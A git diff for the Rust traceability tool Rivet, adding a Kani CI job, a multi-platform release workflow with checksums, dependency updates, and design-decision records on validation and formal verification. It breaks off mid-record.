diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index abe892c..0f74f56 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -221,6 +221,16 @@ jobs: - name: Check supply chain run: cargo vet --locked || echo "::warning::cargo-vet found unaudited crates — run 'cargo vet' locally" + # ── Kani bounded model checking ──────────────────────────────────── + kani: + name: Kani Proofs + runs-on: ubuntu-latest + continue-on-error: true + steps: + - uses: actions/checkout@v6 + - uses: model-checking/kani-github-action@v1 + - run: cargo kani -p rivet-core + # ── MSRV check ────────────────────────────────────────────────────── msrv: name: MSRV (1.89) diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index c4962b8..076ca33 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -1,4 +1,4 @@ -name: Release Test Evidence +name: Release on: push: @@ -12,8 +12,112 @@ env: CARGO_TERM_COLOR: always jobs: - test-evidence: - name: Build Test Evidence Bundle + # ── Cross-platform binary builds ────────────────────────────────────── + build-binaries: + name: Build ${{ matrix.target }} + runs-on: ${{ matrix.os }} + strategy: + matrix: + include: + - target: x86_64-unknown-linux-gnu + os: ubuntu-latest + archive: tar.gz + - target: aarch64-unknown-linux-gnu + os: ubuntu-latest + archive: tar.gz + cross: true + - target: x86_64-apple-darwin + os: macos-14 + archive: tar.gz + - target: aarch64-apple-darwin + os: macos-latest + archive: tar.gz + - target: x86_64-pc-windows-msvc + os: windows-latest + archive: zip + steps: + - uses: actions/checkout@v4 + + - uses: dtolnay/rust-toolchain@stable + with: + targets: ${{ matrix.target }} + + - uses: Swatinem/rust-cache@v2 + with: + key: release-${{ matrix.target }} + + - name: Install cross + if: matrix.cross + run: cargo install cross --git https://github.com/cross-rs/cross + + - name: Build (native) + if: ${{ !matrix.cross }} + run: cargo build --release --target ${{ matrix.target }} -p rivet-cli + + - name: Build (cross) + if: matrix.cross + run: cross build --release --target ${{ matrix.target }} -p rivet-cli + + - name: Strip binary (Unix) + if: runner.os != 'Windows' + run: strip "target/${{ matrix.target }}/release/rivet" 2>/dev/null || true + + - name: Package (tar.gz) + if: matrix.archive == 'tar.gz' + env: + TARGET: ${{ matrix.target }} + run: | + VERSION="${GITHUB_REF#refs/tags/}" + ARCHIVE="rivet-${VERSION}-${TARGET}.tar.gz" + mkdir -p staging + cp "target/${TARGET}/release/rivet" staging/ + tar -czf "$ARCHIVE" -C staging . + echo "ARCHIVE=$ARCHIVE" >> "$GITHUB_ENV" + + - name: Package (zip) + if: matrix.archive == 'zip' + shell: bash + env: + TARGET: ${{ matrix.target }} + run: | + VERSION="${GITHUB_REF#refs/tags/}" + ARCHIVE="rivet-${VERSION}-${TARGET}.zip" + mkdir -p staging + cp "target/${TARGET}/release/rivet.exe" staging/ + cd staging && 7z a "../$ARCHIVE" . && cd .. + echo "ARCHIVE=$ARCHIVE" >> "$GITHUB_ENV" + + - uses: actions/upload-artifact@v4 + with: + name: binary-${{ matrix.target }} + path: ${{ env.ARCHIVE }} + + # ── Compliance report (HTML export) ─────────────────────────────────── + build-compliance: + name: Build compliance report + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: dtolnay/rust-toolchain@stable + - uses: Swatinem/rust-cache@v2 + + - name: Generate compliance report + run: | + VERSION="${GITHUB_REF#refs/tags/}" + mkdir -p compliance-report + cargo run --release -- validate > compliance-report/validation.txt 2>&1 || true + cargo run --release -- stats > compliance-report/stats.txt 2>&1 + cargo run --release -- export --format html --output compliance-report/artifacts.html 2>&1 || true + tar czf "rivet-${VERSION}-compliance.tar.gz" compliance-report/ + + - uses: actions/upload-artifact@v4 + with: + name: compliance-report + path: rivet-*-compliance.tar.gz + + # ── Test evidence bundle ────────────────────────────────────────────── + build-test-evidence: + name: Build test evidence runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -21,37 +125,39 @@ jobs: - uses: dtolnay/rust-toolchain@nightly with: components: llvm-tools-preview + targets: wasm32-wasip2 - uses: Swatinem/rust-cache@v2 - # Install tools: cargo-nextest for JUnit XML, cargo-llvm-cov for coverage - - name: Install cargo-nextest and cargo-llvm-cov + - name: Install tools uses: taiki-e/install-action@v2 with: tool: cargo-nextest,cargo-llvm-cov - # ── 1. Test suite with JUnit XML output ───────────────────────────── - - name: Run tests with JUnit XML output + - name: Build spar WASM assets + run: | + git clone --depth 1 https://github.com/pulseengine/spar.git ../spar + npm install -g @bytecodealliance/jco + ./scripts/build-wasm.sh ../spar + + - name: Run tests with JUnit XML run: | mkdir -p test-evidence/test-results cargo nextest run --all --profile ci cp target/nextest/ci/junit.xml test-evidence/test-results/junit.xml - # ── 2. Code coverage (LCOV) ──────────────────────────────────────── - - name: Generate code coverage (LCOV) + - name: Generate coverage run: | mkdir -p test-evidence/coverage cargo llvm-cov --all-features --workspace --lcov --output-path test-evidence/coverage/lcov.info - cargo llvm-cov report --all-features --workspace > test-evidence/coverage/summary.txt + cargo llvm-cov report --workspace > test-evidence/coverage/summary.txt - # ── 3. Benchmarks (criterion HTML reports) ───────────────────────── - - name: Run criterion benchmarks + - name: Run benchmarks run: | cargo bench --bench core_benchmarks -- --output-format=criterion mkdir -p test-evidence/benchmarks cp -r target/criterion/* test-evidence/benchmarks/ 2>/dev/null || true - # ── 4. Rivet validate ────────────────────────────────────────────── - name: Run rivet validate run: | mkdir -p test-evidence/validation @@ -59,45 +165,61 @@ jobs: cargo run --release -- validate > test-evidence/validation/validate-output.txt 2>&1 rc=$? set -e - echo "" >> test-evidence/validation/validate-output.txt echo "exit_code=${rc}" >> test-evidence/validation/validate-output.txt - # ── 5. Metadata ──────────────────────────────────────────────────── - - name: Generate metadata.json + - name: Generate metadata run: | TAG="${GITHUB_REF#refs/tags/}" - RUST_VERSION="$(rustc --version)" - OS_INFO="$(uname -srm)" - TIMESTAMP="$(date -u +%Y-%m-%dT%H:%M:%SZ)" - jq -n \ --arg tag "${TAG}" \ --arg commit "${GITHUB_SHA}" \ - --arg timestamp "${TIMESTAMP}" \ - --arg rust_version "${RUST_VERSION}" \ - --arg os "${OS_INFO}" \ + --arg timestamp "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \ + --arg rust_version "$(rustc --version)" \ + --arg os "$(uname -srm)" \ '{tag: $tag, commit: $commit, timestamp: $timestamp, rust_version: $rust_version, os: $os}' \ > test-evidence/metadata.json - # ── 6. Package everything ────────────────────────────────────────── - - name: Package test evidence tarball - id: package + - name: Package run: | - TAG="${GITHUB_REF#refs/tags/}" - ARCHIVE="test-evidence-${TAG}.tar.gz" - tar czf "${ARCHIVE}" test-evidence/ - echo "archive=${ARCHIVE}" >> "$GITHUB_OUTPUT" - echo "tag=${TAG}" >> "$GITHUB_OUTPUT" + VERSION="${GITHUB_REF#refs/tags/}" + tar czf "rivet-${VERSION}-test-evidence.tar.gz" test-evidence/ - # ── 7. Create GitHub Release with asset ──────────────────────────── - - name: Create GitHub Release + - uses: actions/upload-artifact@v4 + with: + name: test-evidence + path: rivet-*-test-evidence.tar.gz + + # ── Create GitHub Release ───────────────────────────────────────────── + create-release: + name: Create GitHub Release + needs: [build-binaries, build-compliance, build-test-evidence] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Download all artifacts + uses: actions/download-artifact@v4 + with: + path: artifacts + + - name: Collect assets + run: | + mkdir -p release + find artifacts -type f \( -name "*.tar.gz" -o -name "*.zip" \) -exec mv {} release/ \; + ls -la release/ + + - name: Generate checksums + run: | + cd release + sha256sum * > SHA256SUMS.txt + cat SHA256SUMS.txt + + - name: Create Release env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - TAG="${{ steps.package.outputs.tag }}" - ARCHIVE="${{ steps.package.outputs.archive }}" - - gh release create "${TAG}" \ - --title "Release ${TAG}" \ + VERSION="${GITHUB_REF#refs/tags/}" + gh release create "$VERSION" \ + --title "Rivet $VERSION" \ --generate-notes \ - "${ARCHIVE}#Test Evidence (tar.gz)" + release/* diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index ed4c798..6493be4 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -39,7 +39,7 @@ repos: # ── Linting ──────────────────────────────────────────────────── - id: cargo-clippy name: cargo clippy -D warnings - entry: cargo clippy --all-targets -- -D warnings + entry: cargo +stable clippy --all-targets -- -D warnings language: system types: [rust] pass_filenames: false @@ -64,7 +64,7 @@ repos: # ── Dogfood validation ───────────────────────────────────── - id: rivet-validate name: rivet validate (dogfood) - entry: rivet validate --strict + entry: cargo run --release -p rivet-cli -- validate language: system pass_filenames: false files: '(artifacts/.*\.yaml|schemas/.*\.yaml|safety/.*\.yaml|rivet\.yaml)$' diff --git a/Cargo.lock b/Cargo.lock index dcff37c..bbbbcd0 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -136,6 +136,17 @@ version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0" +[[package]] +name = "auto_impl" +version = "1.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ffdcb70bdbc4d478427380519163274ac86e52916e10f0a8889adf0f96d3fee7" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "autocfg" version = "1.5.0" @@ -169,7 +180,7 @@ dependencies = [ "serde_urlencoded", "sync_wrapper", "tokio", - "tower", + "tower 0.5.3", "tower-layer", "tower-service", "tracing", @@ -215,6 +226,12 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7" +[[package]] +name = "bitflags" +version = "1.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" + [[package]] name = "bitflags" version = "2.11.0" @@ -745,6 +762,19 @@ dependencies = [ "typenum", ] +[[package]] +name = "dashmap" +version = "5.5.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "978747c1d849a7d2ee5e8adc0159961c48fb7e5db2f06af6723b80123bb53856" +dependencies = [ + "cfg-if", + "hashbrown 0.14.5", + "lock_api", + "once_cell", + "parking_lot_core", +] + [[package]] name = "deadpool" version = "0.12.3" @@ -884,7 +914,7 @@ dependencies = [ name = "etch" version = "0.1.0" dependencies = [ - "petgraph", + "petgraph 0.7.1", ] [[package]] @@ -916,6 +946,12 @@ version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0ce7134b9999ecaf8bcd65542e436736ef32ddca1b3e06094cb6ec5755203b80" +[[package]] +name = "fixedbitset" +version = "0.5.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1d674e81391d1e1ab681a28d99df07927c6d4aa5b027d7da16ba32d1d21ecd99" + [[package]] name = "fnv" version = "1.0.7" @@ -1057,7 +1093,7 @@ version = "0.8.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "25234f20a3ec0a962a61770cfe39ecf03cb529a6e474ad8cff025ed497eda557" dependencies = [ - "bitflags", + "bitflags 2.11.0", "debugid", "rustc-hash 2.1.1", "serde", @@ -1720,6 +1756,19 @@ version = "0.4.29" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" +[[package]] +name = "lsp-types" +version = "0.94.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c66bfd44a06ae10647fe3f8214762e9369fd4248df1350924b4ef9e770a85ea1" +dependencies = [ + "bitflags 1.3.2", + "serde", + "serde_json", + "serde_repr", + "url", +] + [[package]] name = "mach2" version = "0.4.3" @@ -1864,7 +1913,7 @@ version = "0.10.75" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "08838db121398ad17ab8531ce9de97b244589089e290a384c900cb9ff7434328" dependencies = [ - "bitflags", + "bitflags 2.11.0", "cfg-if", "foreign-types", "libc", @@ -1937,10 +1986,40 @@ version = "0.6.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b4c5cc86750666a3ed20bdaf5ca2a0344f9c67674cae0515bec2da16fbaa47db" dependencies = [ - "fixedbitset", + "fixedbitset 0.4.2", "indexmap", ] +[[package]] +name = "petgraph" +version = "0.7.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3672b37090dbd86368a4145bc067582552b29c27377cad4e0a306c97f9bd7772" +dependencies = [ + "fixedbitset 0.5.7", + "indexmap", +] + +[[package]] +name = "pin-project" +version = "1.1.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f1749c7ed4bcaf4c3d0a3efc28538844fb29bcdd7d2b67b2be7e20ba861ff517" +dependencies = [ + "pin-project-internal", +] + +[[package]] +name = "pin-project-internal" +version = "1.1.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9b20ed30f105399776b9c883e68e536ef602a16ae6f596d2c473591d6ad64c6" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "pin-project-lite" version = "0.2.17" @@ -2059,7 +2138,7 @@ checksum = "37566cb3fdacef14c0737f9546df7cfeadbfbc9fef10991038bf5015d0c80532" dependencies = [ "bit-set", "bit-vec", - "bitflags", + "bitflags 2.11.0", "num-traits", "rand 0.9.2", "rand_chacha 0.9.0", @@ -2233,7 +2312,7 @@ version = "0.5.18" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ed2bf2547551a7053d6fdfafda3f938979645c44812fbfcda098faae3f1a362d" dependencies = [ - "bitflags", + "bitflags 2.11.0", ] [[package]] @@ -2321,7 +2400,7 @@ dependencies = [ "sync_wrapper", "tokio", "tokio-native-tls", - "tower", + "tower 0.5.3", "tower-http", "tower-service", "url", @@ -2354,7 +2433,7 @@ dependencies = [ "env_logger", "etch", "log", - "petgraph", + "petgraph 0.7.1", "rivet-core", "serde", "serde_json", @@ -2362,6 +2441,7 @@ dependencies = [ "tempfile", "tokio", "tower-http", + "tower-lsp", "urlencoding", ] @@ -2372,7 +2452,7 @@ dependencies = [ "anyhow", "criterion", "log", - "petgraph", + "petgraph 0.7.1", "proptest", "quick-xml", "reqwest", @@ -2427,7 +2507,7 @@ version = "0.38.44" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fdb5bc1ae2baa591800df16c9ca78619bf65c0488b41b96ccec5d11220d8c154" dependencies = [ - "bitflags", + "bitflags 2.11.0", "errno", "libc", "linux-raw-sys 0.4.15", @@ -2440,7 +2520,7 @@ version = "1.1.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b6fe4565b9518b83ef4f91bb47ce29620ca828bd32cb7e408f0062e9930ba190" dependencies = [ - "bitflags", + "bitflags 2.11.0", "errno", "libc", "linux-raw-sys 0.12.1", @@ -2602,7 +2682,7 @@ version = "3.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b7f4bc775c73d9a02cde8bf7b2ec4c9d12743edf609006c7facc23998404cd1d" dependencies = [ - "bitflags", + "bitflags 2.11.0", "core-foundation 0.10.1", "core-foundation-sys", "libc", @@ -2683,6 +2763,17 @@ dependencies = [ "serde_core", ] +[[package]] +name = "serde_repr" +version = "0.1.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "serde_spanned" version = "1.0.4" @@ -2946,7 +3037,7 @@ version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a13f3d0daba03132c0aa9767f98351b3488edc2c100cda2d2ec2b04f3d8d3c8b" dependencies = [ - "bitflags", + "bitflags 2.11.0", "core-foundation 0.9.4", "system-configuration-sys", ] @@ -2967,7 +3058,7 @@ version = "0.27.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "cc4592f674ce18521c2a81483873a49596655b179f71c5e05d10c1fe66c78745" dependencies = [ - "bitflags", + "bitflags 2.11.0", "cap-fs-ext", "cap-std", "fd-lock", @@ -3177,6 +3268,20 @@ version = "1.0.6+spec-1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ab16f14aed21ee8bfd8ec22513f7287cd4a91aa92e44edfe2c17ddd004e92607" +[[package]] +name = "tower" +version = "0.4.13" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b8fa9be0de6cf49e536ce1851f987bd21a43b771b09473c3549a6c853db37c1c" +dependencies = [ + "futures-core", + "futures-util", + "pin-project", + "pin-project-lite", + "tower-layer", + "tower-service", +] + [[package]] name = "tower" version = "0.5.3" @@ -3199,7 +3304,7 @@ version = "0.6.8" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d4e6559d53cc268e5031cd8429d05415bc4cb4aefc4aa5d6cc35fbf5b924a1f8" dependencies = [ - "bitflags", + "bitflags 2.11.0", "bytes", "futures-core", "futures-util", @@ -3215,7 +3320,7 @@ dependencies = [ "pin-project-lite", "tokio", "tokio-util", - "tower", + "tower 0.5.3", "tower-layer", "tower-service", "tracing", @@ -3227,6 +3332,40 @@ version = "0.3.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "121c2a6cda46980bb0fcd1647ffaf6cd3fc79a013de288782836f6df9c48780e" +[[package]] +name = "tower-lsp" +version = "0.20.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d4ba052b54a6627628d9b3c34c176e7eda8359b7da9acd497b9f20998d118508" +dependencies = [ + "async-trait", + "auto_impl", + "bytes", + "dashmap", + "futures", + "httparse", + "lsp-types", + "memchr", + "serde", + "serde_json", + "tokio", + "tokio-util", + "tower 0.4.13", + "tower-lsp-macros", + "tracing", +] + +[[package]] +name = "tower-lsp-macros" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "84fd902d4e0b9a4b27f2f440108dc034e1758628a9b702f8ec61ad66355422fa" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "tower-service" version = "0.3.3" @@ -3329,6 +3468,7 @@ dependencies = [ "idna", "percent-encoding", "serde", + "serde_derive", ] [[package]] @@ -3493,7 +3633,7 @@ dependencies = [ "im-rc", "indexmap", "log", - "petgraph", + "petgraph 0.6.5", "serde", "serde_derive", "serde_yaml", @@ -3541,7 +3681,7 @@ version = "0.244.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe" dependencies = [ - "bitflags", + "bitflags 2.11.0", "hashbrown 0.15.5", "indexmap", "semver", @@ -3554,7 +3694,7 @@ version = "0.245.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "4f08c9adee0428b7bddf3890fc27e015ac4b761cc608c822667102b8bfd6995e" dependencies = [ - "bitflags", + "bitflags 2.11.0", "indexmap", "semver", ] @@ -3578,7 +3718,7 @@ checksum = "39bef52be4fb4c5b47d36f847172e896bc94b35c9c6a6f07117686bd16ed89a7" dependencies = [ "addr2line", "async-trait", - "bitflags", + "bitflags 2.11.0", "bumpalo", "cc", "cfg-if", @@ -3817,7 +3957,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "102d0d70dbfede00e4cc9c24e86df6d32c03bf6f5ad06b5d6c76b0a4a5004c4a" dependencies = [ "anyhow", - "bitflags", + "bitflags 2.11.0", "heck", "indexmap", "wit-parser", @@ -3830,7 +3970,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ea938f6f4f11e5ffe6d8b6f34c9a994821db9511c3e9c98e535896f27d06bb92" dependencies = [ "async-trait", - "bitflags", + "bitflags 2.11.0", "bytes", "cap-fs-ext", "cap-net-ext", @@ -3913,7 +4053,7 @@ version = "42.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2dca2bf96d20f0c70e6741cc6c8c1a9ee4c3c0310c7ad1971242628c083cc9a5" dependencies = [ - "bitflags", + "bitflags 2.11.0", "thiserror 2.0.18", "tracing", "wasmtime", @@ -4170,7 +4310,7 @@ version = "0.36.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3f3fd376f71958b862e7afb20cfe5a22830e1963462f3a17f49d82a6c1d1f42d" dependencies = [ - "bitflags", + "bitflags 2.11.0", "windows-sys 0.59.0", ] @@ -4255,7 +4395,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2" dependencies = [ "anyhow", - "bitflags", + "bitflags 2.11.0", "indexmap", "log", "serde", diff --git a/Cargo.toml b/Cargo.toml index e35b7ea..96fd96c 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -13,6 +13,9 @@ edition = "2024" license = "Apache-2.0" rust-version = "1.89" +[workspace.lints.rust] +unexpected_cfgs = { level = "warn", check-cfg = ['cfg(kani)'] } + [workspace.dependencies] # Serialization serde = { version = "1", features = ["derive"] } @@ -27,12 +30,15 @@ thiserror = "2" clap = { version = "4", features = ["derive"] } # Graph -petgraph = "0.6" +petgraph = "0.7" # Logging log = "0.4" env_logger = "0.11" +# LSP +tower-lsp = "0.20" + # HTTP / serve axum = "0.8" reqwest = { version = "0.12", features = ["json"] } diff --git a/artifacts/decisions.yaml b/artifacts/decisions.yaml index bb68cb4..1ae4609 100644 --- a/artifacts/decisions.yaml +++ b/artifacts/decisions.yaml @@ -366,3 +366,308 @@ artifacts: rationale: > Scales naturally. Avoids redundant declarations. Similar to cargo/npm dependency resolution. + + - id: DD-018 + type: design-decision + title: Schema-embedded conditional rules over external rule engine + status: draft + description: > + Conditional validation rules are expressed directly in schema YAML + using a when/then syntax, rather than using an external rule engine + (OPA, Drools) or embedding Lua/WASM scripting. + tags: [validation, schema] + links: + - type: satisfies + target: REQ-023 + fields: + rationale: > + YAML-native rules keep the single-source-of-truth principle — the + schema file fully describes what is valid. An external rule engine + adds a deployment dependency and splits validation logic across + two systems. Eclipse SCORE's metamodel.yaml approach validates this + direction — their community prefers declarative YAML over code. + alternatives: > + OPA/Rego policies or embedded Lua scripting for validation rules. + Rejected because they add runtime dependencies and split validation + logic away from the schema that defines the types. + + - id: DD-019 + type: design-decision + title: Content hashing with graph traversal for impact analysis + status: draft + description: > + Change impact is computed by content-hashing each artifact (title + + description + fields + links), diffing hashes against a baseline, + and walking the petgraph link graph from changed nodes to find + transitively affected artifacts. No separate change-tracking database. + tags: [traceability, baseline] + links: + - type: satisfies + target: REQ-024 + fields: + rationale: > + Combines two existing capabilities (rivet diff + petgraph reachability) + rather than adding infrastructure. Content hashing is deterministic + and git-friendly. Eclipse SCORE is waiting on sphinx-needs upstream + to implement hash-based versioned links — Rivet can implement this + natively since artifacts are plain data structures. + alternatives: > + Git-diff-based detection (parse YAML file diffs). Rejected because + YAML formatting changes produce false positives and it cannot detect + semantic changes (e.g., reordered fields that are logically identical). + + - id: DD-020 + type: design-decision + title: Configurable type mapping for needs.json import + status: draft + description: > + The needs-json adapter uses a user-defined type-mapping table in + rivet.yaml to convert sphinx-needs type names to rivet schema types, + rather than hard-coding a fixed mapping or auto-generating types. + tags: [interchange, adapter] + links: + - type: satisfies + target: REQ-025 + fields: + rationale: > + Every sphinx-needs project defines its own custom types (SCORE has + 50+). A fixed mapping would only work for one project. User-defined + mapping lets teams control how their specific types map to rivet + schemas. The same approach works for ID format transformation + (underscores to dashes, prefix stripping). + alternatives: > + Auto-generate rivet schema types from needs.json structure. + Rejected because it would create throwaway types that don't + align with any standard schema (aspice, stpa, cybersecurity). + + - id: DD-021 + type: design-decision + title: Ephemeral test nodes via source scanning over materialized YAML + status: draft + description: > + Test-to-requirement links are extracted from source code markers and + test results at analysis time, injected as ephemeral nodes into the + link graph — the same pattern used for commit traceability (DD-012). + No test artifact YAML files are generated. + tags: [testing, traceability] + links: + - type: satisfies + target: REQ-026 + fields: + rationale: > + Test code is the source of truth for what tests exist and what they + verify. Materializing test YAML creates a redundant store that drifts + from the actual test suite. The ephemeral injection pattern is already + proven for commit nodes (DD-012) and avoids the maintenance burden + Eclipse SCORE faces with their manual test specification YAML. + alternatives: > + Generate test artifact YAML via a rivet sync-tests command. + Rejected because it creates thousands of files that must be + re-synced whenever tests change, duplicating DD-012's lesson. + + - id: DD-022 + type: design-decision + title: Build-system providers over rivet-specific externals config + status: draft + description: > + Cross-repo dependencies are discovered via pluggable build-system + providers (Bazel, Nix, custom JSON) rather than a rivet-specific + externals block. Each provider reads the build system's native + manifest to extract repo URLs, pinned revisions, and workspace + paths. Manual overrides are still supported for artifact-path + hints and repos not in the build graph. + tags: [cross-repo, bazel, nix] + links: + - type: satisfies + target: REQ-027 + - type: satisfies + target: REQ-020 + fields: + rationale: > + The build system is the source of truth for what depends on what + at which version. A parallel rivet-specific config drifts and + adds maintenance burden. Bazel MODULE.bazel, Nix flake.lock, + and SCORE's known_good.json all contain exactly the information + rivet needs. Reading them directly means zero-config cross-repo + validation for projects already using these build systems. + Source code linking across repos also requires knowing workspace + paths, which the build system already resolves. + alternatives: > + Rivet-only externals config with manual repo/ref declarations. + Kept as fallback for projects without Bazel or Nix, but not + the primary path for build-system-managed projects. + + - id: DD-023 + type: design-decision + title: rowan CST over serde deserialization for build-system parsers + status: draft + description: > + Build-system manifest parsers (MODULE.bazel Starlark subset) use + rowan for lossless concrete syntax trees rather than serde-based + deserialization or regex extraction. Hand-written lexer + recursive + descent parser, same architecture as spar-syntax. + tags: [parsing, rowan, architecture] + links: + - type: satisfies + target: REQ-028 + - type: satisfies + target: REQ-027 + fields: + rationale: > + rowan provides lossless CST with byte-exact spans for diagnostics, + error recovery for partial parses, and a proven architecture already + used in spar and rust-analyzer. Regex fails silently on malformed + input. serde requires well-formed input and loses positional info. + The MODULE.bazel Starlark subset is small (~30 syntax kinds) so + the parser is compact. The same rowan infrastructure will later + support schema and artifact file parsing for full LSP integration. + alternatives: > + Facebook starlark-rust crate (full interpreter, ~50k lines, + massive overkill). tree-sitter-starlark (adds C dependency, + grammar may not be maintained). Both rejected in favor of the + lightweight hand-written approach proven in spar. + + - id: DD-024 + type: design-decision + title: salsa incremental computation for the validation pipeline + status: draft + description: > + The validation pipeline is restructured as salsa tracked queries: + parse → store → link_graph → conditional_rules → validate. salsa's + dependency tracking enables incremental revalidation, free change + impact analysis, and LSP-ready architecture. Phased adoption alongside + existing serde_yaml pipeline. + tags: [validation, salsa, architecture] + links: + - type: satisfies + target: REQ-029 + - type: satisfies + target: REQ-023 + - type: satisfies + target: REQ-024 + fields: + rationale: > + salsa provides automatic fine-grained dependency tracking between + computations. When one artifact changes, only affected validation + rules re-evaluate. This makes conditional rules (REQ-023) efficient + at scale and change impact analysis (REQ-024) free — impacted + artifacts are exactly the invalidated salsa queries. The same + database serves as an LSP backend for IDE integration. spar already + uses salsa 0.26 successfully for AADL incremental analysis. + alternatives: > + Manual invalidation tracking with dirty flags. Rejected because + it reimplements what salsa does correctly and is error-prone for + transitive dependencies. The phased approach keeps the existing + pipeline working during migration. + + - id: DD-028 + type: design-decision + title: Append-to-file mutation with schema pre-validation + status: draft + description: > + CLI mutation commands (add, modify, remove, link, unlink) load the + full schema and artifact store, validate the mutation against both, + then append to or modify the target YAML file. The mutation is + rejected with a diagnostic if it would violate any schema rule. + For STPA artifacts, the STPA-specific adapter handles the different + YAML structure (losses, hazards, ucas, etc.) transparently. + tags: [cli, mutation, architecture] + links: + - type: satisfies + target: REQ-031 + fields: + rationale: > + Schema pre-validation at write time catches errors immediately + rather than at the next validate run. This makes the CLI the + authoritative mutation interface — safer than hand-editing YAML + or delegating to AI agents that may produce structurally valid + but semantically wrong artifacts. Appending preserves existing + file structure and comments. + alternatives: > + Full file rewrite via serde roundtrip. Rejected because serde + does not preserve comments, key ordering, or blank lines in + YAML. A rowan-based YAML CST editor could preserve formatting + but is a larger investment (future work for the salsa migration). + + - id: DD-025 + type: design-decision + title: Kani bounded model checking for panic freedom + status: draft + description: > + Core algorithms (link graph construction, schema merge, artifact + ref parsing, cycle detection, cardinality validation) are verified + panic-free via Kani proof harnesses. Kani exhaustively checks all + inputs within configurable bounds using CBMC. + tags: [formal-verification, kani] + links: + - type: satisfies + target: REQ-030 + fields: + rationale: > + Kani is the lowest-effort highest-value formal verification tool + for Rust. Proof harnesses are ~10-30 lines each, similar to + proptest but exhaustive rather than random. Kani is already used + by AWS for safety-critical Rust (s2n-tls, Firecracker). It + complements existing proptest (random sampling) and Miri (UB + detection) with bounded exhaustive checking. + alternatives: > + Relying solely on proptest + fuzzing. Rejected because random + testing cannot prove absence of panics — only Kani's exhaustive + bounded checking can. Both are kept: proptest for quick CI, + Kani for proof. + + - id: DD-026 + type: design-decision + title: Verus inline proofs for validation soundness and completeness + status: draft + description: > + The validation engine's core functions are annotated with Verus + requires/ensures contracts proving soundness (PASS implies all + rules satisfied) and completeness (rule violation implies diagnostic + emitted). Verus uses SMT solving for automated proof discharge. + tags: [formal-verification, verus] + links: + - type: satisfies + target: REQ-030 + fields: + rationale: > + Verus is Rust-native — proofs are inline annotations, not a + separate language. It understands Rust ownership and lifetimes + natively. Proving validation soundness and completeness is the + key property for ISO 26262 TCL 1 tool qualification. No other + traceability tool has this level of correctness evidence. + alternatives: > + Creusot (Why3-based). Similar capability but less Rust-native + integration. Prusti (Viper-based). Less mature for complex + data structures. Both viable but Verus has the strongest + Rust integration story. + + - id: DD-027 + type: design-decision + title: Rocq metamodel proofs for schema semantics + status: draft + description: > + Schema semantics (traceability rule systems, conditional rules, + link type algebra) are modeled in Rocq via coq-of-rust translation. + Properties proven include schema satisfiability, rule consistency, + monotonicity, and ASPICE V-model completeness. Rocq proofs serve + as the formal specification against which the Rust implementation + is validated. + 